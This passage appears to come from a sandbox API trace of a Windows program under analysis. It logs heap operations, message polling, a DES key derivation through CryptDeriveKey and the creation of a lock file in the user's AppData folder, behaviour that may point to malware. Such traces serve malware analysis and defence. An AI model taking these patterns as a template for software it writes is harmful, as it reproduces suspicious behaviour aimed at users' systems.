lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0156.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaabd0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0156.481] CryptDeriveKey (in: hProv=0x9bee68, Algid=0x6601, hBaseData=0x9e1e38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2178) returned 1 [0156.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.482] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.482] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0156.482] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.482] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0156.482] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0156.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0156.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0156.482] CryptDestroyHash (hHash=0x9e1e38) returned 1 [0156.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.482] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.482] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.482] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.482] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.483] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/ConnectedDevicesPlatform" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\connecteddevicesplatform"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.483] GetLastError () returned 0x5 [0156.483] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0156.483] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.483] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0156.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0156.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0156.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0156.483] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0156.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0156.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0156.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0156.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0156.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0156.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0156.484] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.ConnectedDevicesPlatform" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.connecteddevicesplatform"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0156.485] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0156.485] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0156.485] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0156.485] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0156.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0156.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0156.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0156.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0156.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0156.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0156.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0156.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0156.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0156.488] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0156.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0156.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0156.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0156.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa858 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0156.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0156.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0156.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0156.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0156.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0156.489] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0156.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0156.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0156.489] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0156.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0156.490] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0156.490] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0156.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 